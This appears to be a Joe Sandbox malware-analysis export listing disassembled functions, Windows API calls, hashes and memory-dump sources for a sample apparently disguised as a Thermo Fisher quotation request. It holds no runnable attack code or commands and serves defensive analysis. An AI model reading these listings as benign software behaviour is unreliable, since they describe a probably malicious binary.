                                                              • Opcode ID: eb5ef6d410e87245a0603e8d3bd1ab5c01f358beb5c3afd2401898e10d6c1154
                                                              • Instruction ID: f2dc4870e32c32f237faf612844bda908958ce48e45445c221cf217e5778ebbc
                                                              • Opcode Fuzzy Hash: eb5ef6d410e87245a0603e8d3bd1ab5c01f358beb5c3afd2401898e10d6c1154
                                                              • Instruction Fuzzy Hash: 86411B72900218BEDB11DFA4CD82AEEB779BF09710F004199FA45B7181DA71AF85CBA1
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0069DC00,00000000,?,?,?,?), ref: 0066A6D8
                                                              • GetWindowLongW.USER32 ref: 0066A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0066A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 67f2f043e234ee3fd4e3c2892a2c32e8158b887a4592c7f96f73fd7ca21ea235
                                                              • Instruction ID: 6b0ce814b26452fa891bbf0d669d6b74ab9c33529905ddf68ea120ea13a8c936
                                                              • Opcode Fuzzy Hash: 67f2f043e234ee3fd4e3c2892a2c32e8158b887a4592c7f96f73fd7ca21ea235
                                                              • Instruction Fuzzy Hash: A431B035100205ABDB118F74CC41BEA7BAAEF49324F244719F875E32E1C770A8508B94
                                                              APIs
                                                              • _memset.LIBCMT ref: 00655190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006551C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |$De
                                                              • API String ID: 1413715105-2705808982
                                                              • Opcode ID: dab89b8e761ea8fa90adf485ad1245d8393401c2b7dac45d19dd40bfcccf88e0
                                                              • Instruction ID: 49d7547f560e9a23db823b03f6ab845eb3587045e0ac169addba71893723f856
                                                              • Opcode Fuzzy Hash: dab89b8e761ea8fa90adf485ad1245d8393401c2b7dac45d19dd40bfcccf88e0
                                                              • Instruction Fuzzy Hash: FD313C71C00119ABCF45EFE4CD85AEE7FBAFF14710F000119F815A6166EB31AA06DBA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0066A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0066A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0066A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: b47049639d11718af341034eacbb65a05e86498109f994b63077ef21efb4a20d
                                                              • Instruction ID: b1c3ad6a33ade584f6fe5f41fa7390a52b686d984be61f855b3c6f1f7d0e5ade
                                                              • Opcode Fuzzy Hash: b47049639d11718af341034eacbb65a05e86498109f994b63077ef21efb4a20d
                                                              • Instruction Fuzzy Hash: 05219F32510218BBDF118FA4CC42FEA3B7AEF49714F110214FA557B1D0D6B5AC55CBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0066A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0066A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0066A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: a8027fe31d6013cd66980bcb67aff1c459e39e6c38ff6ddafea0779b1170fcfc
                                                              • Instruction ID: 9d15719680a30f891e98d770225552b46b0890813ac47a8d031b45a250a62771
                                                              • Opcode Fuzzy Hash: a8027fe31d6013cd66980bcb67aff1c459e39e6c38ff6ddafea0779b1170fcfc
                                                              • Instruction Fuzzy Hash: 592181B5600209BFDB10DF58CC91DB737AEEF5A354B150159FA049B3A2CA30EC518B61
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00669A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00669A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00669A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 309e944c25030803b8562d8727702e69fc796982f06a6647781203e16594d9c7
                                                              • Instruction ID: 771e2eb3a31a986172c1ffac0b1e17ed4b5500c421c4a65bd6d4c6da5f1eeb62
                                                              • Opcode Fuzzy Hash: 309e944c25030803b8562d8727702e69fc796982f06a6647781203e16594d9c7
                                                              • Instruction Fuzzy Hash: DB218372610118BFDB118F54CC85EFB3BAFEF8A760F118229F9549B290C6719C5187A0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0066A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0066A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0066A48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 64987a33fd56be36fc630f392c592532ddda536722b6e87b50175cd769d301f4
                                                              • Instruction ID: 62547bf5ae2f12684948f0141fdfa1ca710d3c4a0a472b5ac5e430b99fa75fa6
                                                              • Opcode Fuzzy Hash: 64987a33fd56be36fc630f392c592532ddda536722b6e87b50175cd769d301f4
                                                              • Instruction Fuzzy Hash: F111A771240208BEEF245F65CC45FEB37AEEF89754F014228FA45A6191DAB2E851DB24
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00622350,?), ref: 006222A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 006222A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              • Opcode ID: 7192db718cfd27409619976e29bf81803d4722c0a182491de6775cf6942e6a1a
                                                              • Instruction ID: 2e55fb2f2890ee4fea94edfce17a2ccd08b356cde767b36fd797c046cc7bd20c
                                                              • Opcode Fuzzy Hash: 7192db718cfd27409619976e29bf81803d4722c0a182491de6775cf6942e6a1a
                                                              • Instruction Fuzzy Hash: 64E01A70690301FBEB206FB0EC8DF643767AB04B06F106220B202D61E0CBB58080CF24
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00622276), ref: 00622376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0062237D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              • Opcode ID: f8dbd0ce7d688a148134b73c25af2d4f63dc97f1f9dce394b13575f72de1f2bf
                                                              • Instruction ID: 8df56e46b907fed7dfd81bbc5f3b0a32938eb34f29eca966de96cd31ee8ad10b
                                                              • Opcode Fuzzy Hash: f8dbd0ce7d688a148134b73c25af2d4f63dc97f1f9dce394b13575f72de1f2bf
                                                              • Instruction Fuzzy Hash: 28E092B0544305FFEB20AFE1ED1DF647B67B70070AF152614F209925F0CBB894508B25
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: c49b8c71822c4bdbe7d3c891db2066609f098ef064be9346f1a678db5aeb8825
                                                              • Instruction ID: 0193ab0fa5698e7af8ea14dd6518339f7678cd3d7ca742baaed0e9e2853ca1a2
                                                              • Opcode Fuzzy Hash: c49b8c71822c4bdbe7d3c891db2066609f098ef064be9346f1a678db5aeb8825
                                                              • Instruction Fuzzy Hash: 75E012B1804628FBCB6297D0DD05DFD737FA784741F144592B90AA1014D6359BC6EB27
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,006621FB,?,006623EF), ref: 00662213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00662225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              • Opcode ID: f0f5b70e9625fc880df65af405f015dac5b8bea762413aaf9b52470778c19cc9
                                                              • Instruction ID: c9dc7913f1ba11a804579ece5e300058bfd7e479e2ff5cb95b7ab30f51916e45
                                                              • Opcode Fuzzy Hash: f0f5b70e9625fc880df65af405f015dac5b8bea762413aaf9b52470778c19cc9
                                                              • Instruction Fuzzy Hash: F7D0A7F4410B23AFC7215F31F82C68177DBEF04700B015419E881E2290DB70D8C08770
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,006042EC,?,006042AA,?), ref: 00604304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: 92b8f50d6fbf68ab9bfbb079e3fe29b8236982b9b98e7b0a0b2ffd168c81ce44
                                                              • Instruction ID: 6e366885176d537b9c553664e79565b7f5e0795c201927fbc1189916a5179bee
                                                              • Opcode Fuzzy Hash: 92b8f50d6fbf68ab9bfbb079e3fe29b8236982b9b98e7b0a0b2ffd168c81ce44
                                                              • Instruction Fuzzy Hash: C3D09EB0584713AED7285B66A80C68277D6AF14711B115519A595D22A4EAB0D8808760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,006041BB,00604341,?,0060422F,?,006041BB,?,?,?,?,006039FE,?,00000001), ref: 00604359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0060436B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: ae1ef8424d20b056c0cd3700554b492ecbdc6586cddd563968a7ffb12a122278
                                                              • Instruction ID: 8620e1de19f16285ab6f3e8a64c2e13251a817a5715362c2211e7096762c0e78
                                                              • Opcode Fuzzy Hash: ae1ef8424d20b056c0cd3700554b492ecbdc6586cddd563968a7ffb12a122278
                                                              • Instruction Fuzzy Hash: 78D09EB0584713AED7385B76A80868277D6AF14715B115519E5D5D2290EBB0D8808760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0064052F,?,006406D7), ref: 00640572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00640584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              • Opcode ID: bc81d7e2ea44f92ae67851ee7bce44d7951407e0806ca48bb71b42bd9cc3b26e
                                                              • Instruction ID: 5740a69e2bb85aa98c388c7fa830b723e112760a3c1d01768f73110700de8bcc
                                                              • Opcode Fuzzy Hash: bc81d7e2ea44f92ae67851ee7bce44d7951407e0806ca48bb71b42bd9cc3b26e
                                                              • Instruction Fuzzy Hash: 18D0A771450323AFD7205F30E80CB9277EAEF04700B11861DE981D2290D770C4C08B30
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0064051D,?,006405FE), ref: 00640547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00640559
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              • Opcode ID: 53a7a9b8c981171cd28da3977c947a195c87eed175bc49dd05fed80ff33a3260
                                                              • Instruction ID: d0c3a8dae66be0632c9e370d9d3c9f07dba16a92cf14a8b5b1efd0100dfe5dd5
                                                              • Opcode Fuzzy Hash: 53a7a9b8c981171cd28da3977c947a195c87eed175bc49dd05fed80ff33a3260
                                                              • Instruction Fuzzy Hash: E3D0A770480723AFD7209F20F80C69177EAEF00701B11D81DE48AD2290D670C8C08B20
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0065ECBE,?,0065EBBB), ref: 0065ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0065ECE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: a593f4b7cd7f1435109052891aa04f30f1a98f254b8ecf96d88032df2bbbdcf5
                                                              • Instruction ID: 958d52a165c3164cfbfd3e99c1fe27fa335a405d6a12af4915028fe6c211ab36
                                                              • Opcode Fuzzy Hash: a593f4b7cd7f1435109052891aa04f30f1a98f254b8ecf96d88032df2bbbdcf5
                                                              • Instruction Fuzzy Hash: 4DD0A7B0400723BFCF245F61E84C68277E6AF00701F018419FCA5D2291DF74C8C48B20
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0065BAD3,00000001,0065B6EE,?,0069DC00), ref: 0065BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0065BAFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 2ae236d2e3a714f0b234fa0ef25497714d6c4d77736101067c4f47765b912cb3
                                                              • Instruction ID: ebff1e25239e8978b5f107187a5ef49d3014f292a5caca8e42191eaf5949d2b7
                                                              • Opcode Fuzzy Hash: 2ae236d2e3a714f0b234fa0ef25497714d6c4d77736101067c4f47765b912cb3
                                                              • Instruction Fuzzy Hash: 72D09EB0940717AED7306F66A848A9177D6AF04751F115519E89792294DBB0D884C760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00663BD1,?,00663E06), ref: 00663BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00663BFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
